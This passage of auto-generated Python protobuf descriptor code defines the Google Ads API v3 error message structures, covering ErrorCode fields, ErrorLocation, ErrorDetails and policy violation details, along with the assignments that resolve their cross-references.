serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='setting_error', full_name='google.ads.googleads.v3.errors.ErrorCode.setting_error', index=47,
number=52, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='string_format_error', full_name='google.ads.googleads.v3.errors.ErrorCode.string_format_error', index=48,
number=53, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='string_length_error', full_name='google.ads.googleads.v3.errors.ErrorCode.string_length_error', index=49,
number=54, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operation_access_denied_error', full_name='google.ads.googleads.v3.errors.ErrorCode.operation_access_denied_error', index=50,
number=55, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_access_denied_error', full_name='google.ads.googleads.v3.errors.ErrorCode.resource_access_denied_error', index=51,
number=56, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_count_limit_exceeded_error', full_name='google.ads.googleads.v3.errors.ErrorCode.resource_count_limit_exceeded_error', index=52,
number=57, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='youtube_video_registration_error', full_name='google.ads.googleads.v3.errors.ErrorCode.youtube_video_registration_error', index=53,
number=117, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_bid_modifier_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_bid_modifier_error', index=54,
number=59, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='context_error', full_name='google.ads.googleads.v3.errors.ErrorCode.context_error', index=55,
number=60, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='field_error', full_name='google.ads.googleads.v3.errors.ErrorCode.field_error', index=56,
number=61, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='shared_set_error', full_name='google.ads.googleads.v3.errors.ErrorCode.shared_set_error', index=57,
number=62, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='shared_criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.shared_criterion_error', index=58,
number=63, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_shared_set_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_shared_set_error', index=59,
number=64, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conversion_action_error', full_name='google.ads.googleads.v3.errors.ErrorCode.conversion_action_error', index=60,
number=65, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conversion_adjustment_upload_error', full_name='google.ads.googleads.v3.errors.ErrorCode.conversion_adjustment_upload_error', index=61,
number=115, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conversion_upload_error', full_name='google.ads.googleads.v3.errors.ErrorCode.conversion_upload_error', index=62,
number=111, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='header_error', full_name='google.ads.googleads.v3.errors.ErrorCode.header_error', index=63,
number=66, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='database_error', full_name='google.ads.googleads.v3.errors.ErrorCode.database_error', index=64,
number=67, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_finding_error', full_name='google.ads.googleads.v3.errors.ErrorCode.policy_finding_error', index=65,
number=68, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='enum_error', full_name='google.ads.googleads.v3.errors.ErrorCode.enum_error', index=66,
number=70, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_error', index=67,
number=71, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_campaign_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_campaign_error', index=68,
number=72, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_negative_keyword_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_negative_keyword_error', index=69,
number=73, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_ad_group_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_ad_group_error', index=70,
number=74, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_keyword_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_keyword_error', index=71,
number=75, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='keyword_plan_idea_error', full_name='google.ads.googleads.v3.errors.ErrorCode.keyword_plan_idea_error', index=72,
number=76, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='account_budget_proposal_error', full_name='google.ads.googleads.v3.errors.ErrorCode.account_budget_proposal_error', index=73,
number=77, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='user_list_error', full_name='google.ads.googleads.v3.errors.ErrorCode.user_list_error', index=74,
number=78, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='change_status_error', full_name='google.ads.googleads.v3.errors.ErrorCode.change_status_error', index=75,
number=79, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_error', index=76,
number=80, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='geo_target_constant_suggestion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.geo_target_constant_suggestion_error', index=77,
number=81, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_draft_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_draft_error', index=78,
number=82, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_item_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_item_error', index=79,
number=83, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='label_error', full_name='google.ads.googleads.v3.errors.ErrorCode.label_error', index=80,
number=84, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='billing_setup_error', full_name='google.ads.googleads.v3.errors.ErrorCode.billing_setup_error', index=81,
number=87, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_client_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_client_link_error', index=82,
number=88, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_manager_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_manager_link_error', index=83,
number=91, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_mapping_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_mapping_error', index=84,
number=92, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_feed_error', index=85,
number=93, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_feed_error', index=86,
number=94, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_feed_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_feed_error', index=87,
number=96, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_interest_error', full_name='google.ads.googleads.v3.errors.ErrorCode.custom_interest_error', index=88,
number=97, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_experiment_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_experiment_error', index=89,
number=98, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='extension_feed_item_error', full_name='google.ads.googleads.v3.errors.ErrorCode.extension_feed_item_error', index=90,
number=100, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_parameter_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_parameter_error', index=91,
number=101, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_item_validation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_item_validation_error', index=92,
number=102, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='extension_setting_error', full_name='google.ads.googleads.v3.errors.ErrorCode.extension_setting_error', index=93,
number=103, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_item_target_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_item_target_error', index=94,
number=104, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_violation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.policy_violation_error', index=95,
number=105, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mutate_job_error', full_name='google.ads.googleads.v3.errors.ErrorCode.mutate_job_error', index=96,
number=108, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='partial_failure_error', full_name='google.ads.googleads.v3.errors.ErrorCode.partial_failure_error', index=97,
number=112, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_validation_parameter_error', full_name='google.ads.googleads.v3.errors.ErrorCode.policy_validation_parameter_error', index=98,
number=114, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='size_limit_error', full_name='google.ads.googleads.v3.errors.ErrorCode.size_limit_error', index=99,
number=118, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='offline_user_data_job_error', full_name='google.ads.googleads.v3.errors.ErrorCode.offline_user_data_job_error', index=100,
number=119, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='not_whitelisted_error', full_name='google.ads.googleads.v3.errors.ErrorCode.not_whitelisted_error', index=101,
number=120, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='manager_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.manager_link_error', index=102,
number=121, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='currency_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.currency_code_error', index=103,
number=122, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='access_invitation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.access_invitation_error', index=104,
number=124, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='reach_plan_error', full_name='google.ads.googleads.v3.errors.ErrorCode.reach_plan_error', index=105,
number=125, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='invoice_error', full_name='google.ads.googleads.v3.errors.ErrorCode.invoice_error', index=106,
number=126, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='payments_account_error', full_name='google.ads.googleads.v3.errors.ErrorCode.payments_account_error', index=107,
number=127, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='time_zone_error', full_name='google.ads.googleads.v3.errors.ErrorCode.time_zone_error', index=108,
number=128, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='asset_link_error', full_name='google.ads.googleads.v3.errors.ErrorCode.asset_link_error', index=109,
number=129, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='user_data_error', full_name='google.ads.googleads.v3.errors.ErrorCode.user_data_error', index=110,
number=130, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='error_code', full_name='google.ads.googleads.v3.errors.ErrorCode.error_code',
index=0, containing_type=None, fields=[]),
],
serialized_start=7724,
serialized_end=19319,
)
_ERRORLOCATION_FIELDPATHELEMENT = _descriptor.Descriptor(
name='FieldPathElement',
full_name='google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='field_name', full_name='google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement.field_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='index', full_name='google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement.index', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19432,
serialized_end=19514,
)
_ERRORLOCATION = _descriptor.Descriptor(
name='ErrorLocation',
full_name='google.ads.googleads.v3.errors.ErrorLocation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='field_path_elements', full_name='google.ads.googleads.v3.errors.ErrorLocation.field_path_elements', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_ERRORLOCATION_FIELDPATHELEMENT, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19322,
serialized_end=19514,
)
_ERRORDETAILS = _descriptor.Descriptor(
name='ErrorDetails',
full_name='google.ads.googleads.v3.errors.ErrorDetails',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='unpublished_error_code', full_name='google.ads.googleads.v3.errors.ErrorDetails.unpublished_error_code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_violation_details', full_name='google.ads.googleads.v3.errors.ErrorDetails.policy_violation_details', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_finding_details', full_name='google.ads.googleads.v3.errors.ErrorDetails.policy_finding_details', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19517,
serialized_end=19739,
)
_POLICYVIOLATIONDETAILS = _descriptor.Descriptor(
name='PolicyViolationDetails',
full_name='google.ads.googleads.v3.errors.PolicyViolationDetails',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='external_policy_description', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.external_policy_description', index=0,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='key', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.key', index=1,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='external_policy_name', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.external_policy_name', index=2,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='is_exemptible', full_name='google.ads.googleads.v3.errors.PolicyViolationDetails.is_exemptible', index=3,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19742,
serialized_end=19921,
)
_POLICYFINDINGDETAILS = _descriptor.Descriptor(
name='PolicyFindingDetails',
full_name='google.ads.googleads.v3.errors.PolicyFindingDetails',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='policy_topic_entries', full_name='google.ads.googleads.v3.errors.PolicyFindingDetails.policy_topic_entries', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=19923,
serialized_end=20025,
)
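# Resolve cross-references: the descriptors above are built with
# message_type/enum_type left as None, so the assignments below patch in
# the concrete message and enum descriptors before anything is registered.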
_GOOGLEADSFAILURE.fields_by_name['errors'].message_type = _GOOGLEADSERROR
_GOOGLEADSERROR.fields_by_name['error_code'].message_type = _ERRORCODE
_GOOGLEADSERROR.fields_by_name['trigger'].message_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_value__pb2._VALUE
_GOOGLEADSERROR.fields_by_name['location'].message_type = _ERRORLOCATION
_GOOGLEADSERROR.fields_by_name['details'].message_type = _ERRORDETAILS
_ERRORCODE.fields_by_name['request_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_request__error__pb2._REQUESTERRORENUM_REQUESTERROR
_ERRORCODE.fields_by_name['bidding_strategy_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__strategy__error__pb2._BIDDINGSTRATEGYERRORENUM_BIDDINGSTRATEGYERROR
_ERRORCODE.fields_by_name['url_field_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_url__field__error__pb2._URLFIELDERRORENUM_URLFIELDERROR
_ERRORCODE.fields_by_name['list_operation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_list__operation__error__pb2._LISTOPERATIONERRORENUM_LISTOPERATIONERROR
_ERRORCODE.fields_by_name['query_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_query__error__pb2._QUERYERRORENUM_QUERYERROR
_ERRORCODE.fields_by_name['mutate_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__error__pb2._MUTATEERRORENUM_MUTATEERROR
_ERRORCODE.fields_by_name['field_mask_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__mask__error__pb2._FIELDMASKERRORENUM_FIELDMASKERROR
_ERRORCODE.fields_by_name['authorization_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authorization__error__pb2._AUTHORIZATIONERRORENUM_AUTHORIZATIONERROR
_ERRORCODE.fields_by_name['internal_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_internal__error__pb2._INTERNALERRORENUM_INTERNALERROR
_ERRORCODE.fields_by_name['quota_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_quota__error__pb2._QUOTAERRORENUM_QUOTAERROR
_ERRORCODE.fields_by_name['ad_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__error__pb2._ADERRORENUM_ADERROR
_ERRORCODE.fields_by_name['ad_group_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__error__pb2._ADGROUPERRORENUM_ADGROUPERROR
_ERRORCODE.fields_by_name['campaign_budget_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__budget__error__pb2._CAMPAIGNBUDGETERRORENUM_CAMPAIGNBUDGETERROR
_ERRORCODE.fields_by_name['campaign_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__error__pb2._CAMPAIGNERRORENUM_CAMPAIGNERROR
